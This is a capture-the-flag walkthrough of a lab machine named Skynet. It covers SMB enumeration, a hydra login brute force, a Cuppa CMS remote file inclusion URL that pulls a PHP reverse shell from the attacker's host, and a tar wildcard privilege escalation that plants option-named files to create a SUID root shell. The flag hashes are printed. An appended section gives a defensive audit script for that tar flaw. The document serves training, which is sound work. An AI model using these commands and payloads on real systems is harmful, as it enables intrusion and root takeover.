Step 1: Start by scanning the ports with nmap
```
┌──(root㉿kali)-[~]
└─# nmap -p- -sC -sV -T4 10.10.2.72
```
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 22:00 EST
Nmap scan report for 10.10.2.72
Host is up (0.23s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: PIPELINING CAPA TOP SASL AUTH-RESP-CODE UIDL RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IDLE more OK post-login have IMAP4rev1 capabilities Pre-login LOGIN-REFERRALS LITERAL+ listed SASL-IR ID ENABLE LOGINDISABLEDA0001
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2024-01-22T03:05:06
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2024-01-21T21:05:06-06:00
|_clock-skew: mean: 1h59m58s, deviation: 3h27m51s, median: -2s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
```
Ports 139 and 445 are open, so the target is running an SMB service.
```
enum4linux -S 10.10.2.72
```
or
```
smbclient -L \\10.10.2.72
```
This reveals some SMB share/account names that may be accessible: anonymous and milesdyson.
```
smbclient //10.10.2.72/anonymous
```
```
┌──(root㉿kali)-[~]
└─# smbclient //10.10.2.72/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Nov 26 11:04:00 2020
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019

                9204224 blocks of size 1024. 5823148 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Thu Nov 26 11:04:00 2020
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec)
```
```
┌──(root㉿kali)-[~]
└─# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

┌──(root㉿kali)-[~]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```
Next, look at port 80.
```
gobuster dir --url http://10.10.2.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
```
Visiting http://10.10.2.72/squirrelmail redirects to http://10.10.2.72/squirrelmail/src/login.php.
Step 2: This is a login page
From the above, the username is milesdyson.
Password: cyborg007haloterminator
Alternatively, use hydra:
```
# generic http-form-post template (WordPress example)
hydra -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

# the same form adapted to the SquirrelMail login
hydra -l milesdyson -P log1.txt 10.10.2.72 http-form-post "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown User or password incorrect."
```
After logging in, a mailbox is visible.
```
smbclient -U milesdyson //10.10.2.72/milesdyson
```
```
┌──(root㉿kali)-[~]
└─# cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
```
gobuster dir --url http://10.10.2.72/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
```
This yields the CMS administration login page: http://10.10.2.72/45kra24zxs28v3yd/administrator/
Search for the keyword Cuppa on https://www.exploit-db.com/ to find a known exploit for Cuppa CMS:
https://www.exploit-db.com/exploits/25971
Step 3: Build the payload to obtain a shell on the target
```
http://$IP1/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$IP2/php-reverse-shell.php
# IP1 is the target's IP, IP2 is the attacking machine's IP
http://10.10.2.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.63.201:8000/php-reverse-shell.php
```
How it works: this abuses a remote file inclusion vulnerability in the CMS, making the target page include the reverse-shell file served by the simple web server started on the attacking machine. As soon as the payload above is entered in the browser, the target page sends a shell back to the local attacking machine.
Step 4
```
which python   # check whether the target has a Python environment
python -c "import pty ; pty.spawn('/bin/bash')"
```
```
www-data@skynet:/home/milesdyson$ cat user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807
```
Step 5: Privilege escalation
```
www-data@skynet:/home/milesdyson$ cd backups
www-data@skynet:/home/milesdyson/backups$ ls
backup.sh  backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@skynet:/home/milesdyson/backups$
```
The backups directory contains a backup.sh script. It changes into /var/www/html and archives everything in that directory into backup.tgz, which is saved in the backups directory.
Reading /etc/crontab (the scheduled tasks) shows that this backup.sh script is a cron job: it runs every minute as root.
Consulting GTFOBins, we find that the tar command accepts a --checkpoint option, which prints a "progress" message every X archived files (X defaults to 10). --checkpoint can be combined with the --checkpoint-action flag, which runs some action, in the form of a binary or script, each time a checkpoint is reached.
Combining this with what we already know: because backup.sh uses the wildcard *, the archive command is applied to every file and folder in /var/www/html. If we add to /var/www/html a file named --checkpoint=1 (which enables checkpoints) and a file named --checkpoint-action=exec=xxx (which specifies the action; with a checkpoint value of 1 the action runs after every archived file), then when tar processes these files their names are effectively treated as arguments to the tar command, and the action is executed.
In /var/www/html, create a Bash script whose execution produces a SUID binary that is essentially a copy of bash; we name the script newroot.sh:
```
echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > newroot.sh
```
Still in /var/www/html, create the following two files; their only purpose is for their file names to act as arguments on the tar command line:
```
touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh newroot.sh"
```
After about a minute, the scheduled cron job (backup.sh in the backups directory) runs automatically as root and creates the SUID file /tmp/nroot. We can run that SUID file with the -p flag, which makes the binary execute as its owner (root); since the binary is a copy of bash, this gives a root shell.
```
# switch to /tmp
cd /tmp
ls
/tmp/nroot -p
whoami
```
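The defender's side of this step, as an added example that is not part of the original writeup: an audit that lists option-like file names in a web root (the names a wildcard-expanded `tar cf out *` would parse as options) and a hardened form of the cron backup that never puts expanded names on tar's command line. The demo directory and its files are constructed with mktemp; nothing here refers to the target machine.

```shell
#!/bin/sh
# Added example (not from the original writeup): defensive checks for the
# tar wildcard problem in backup.sh. Paths used by the demo at the bottom
# are constructed with mktemp.

# Print every top-level entry of $1 whose name begins with '-'. Such names
# are exactly what an unquoted "tar cf out *" would parse as tar options.
find_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Hardened replacement for "cd DIR && tar cf OUT *": change into the source
# directory and archive '.', so no file name is ever expanded onto tar's
# command line. Returns tar's exit status.
safe_backup() {
    src="$1"
    out="$2"
    tar -C "$src" -cf "$out" .
}

# Return 0 if the archive $1 contains member $2 (stored as ./NAME), 1 otherwise.
# Shows that option-like names end up as ordinary members, nothing more.
archive_has_member() {
    tar -tf "$1" | grep -Fqx -- "./$2"
}

# Demo on a constructed directory: two planted option-like names next to a
# normal file. No script named in the planted name exists, so even a
# vulnerable tar invocation would have nothing to execute here.
demo_dir=$(mktemp -d)
touch "$demo_dir/index.html" "$demo_dir/--checkpoint=1" \
      "$demo_dir/--checkpoint-action=exec=sh newroot.sh"
echo "Option-like names found:"
find_option_like_names "$demo_dir"
safe_backup "$demo_dir" "$demo_dir.tar"
echo "Archive members:"
tar -tf "$demo_dir.tar"
rm -rf "$demo_dir" "$demo_dir.tar"
```

Running `find_option_like_names` over a web root from a cron job of its own gives an early alert that someone with write access is planting tar-option names, independently of whether the backup script has been fixed.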
```
nroot-4.3# cat /root/root.txt
cat /root/root.txt
3f0372db24753accc7179a282cd6a949
```